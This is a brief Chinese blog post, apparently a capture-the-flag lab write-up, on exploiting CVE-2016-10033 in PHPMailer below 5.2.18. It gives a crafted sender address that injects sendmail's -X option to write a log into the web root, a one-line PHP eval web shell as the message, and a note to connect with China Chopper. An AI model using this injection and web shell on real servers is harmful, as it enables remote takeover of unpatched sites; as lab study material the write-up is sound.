墨者学院-PHPMailer远程命令执行漏洞溯源

靶场地址:

https://www.mozhe.cn/bug/detail/UWpyd2RwWTFldDFCSldpMmJ5a0tRZz09bW96aGUmozhe

漏洞编号:CVE-2016-10033

影响范围:PHPMailer版本<5.2.18

漏洞原理:PHPMailer中的mail函数在发送邮件时使用了系统sendmail方法,由于没有足够过滤使得用户可以注入攻击代码

Exp:

构造邮箱

"attacker\" -oQ/tmp -X/var/www/html/shell.php some"@email.com

消息:

<?php @eval($_POST[a]);?>

sendmail -X参数可以将日志写入指定文件


发送后页面卡住了,但是不要紧,其实一句话木马已经写入了


上菜刀拿key就可以了


最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。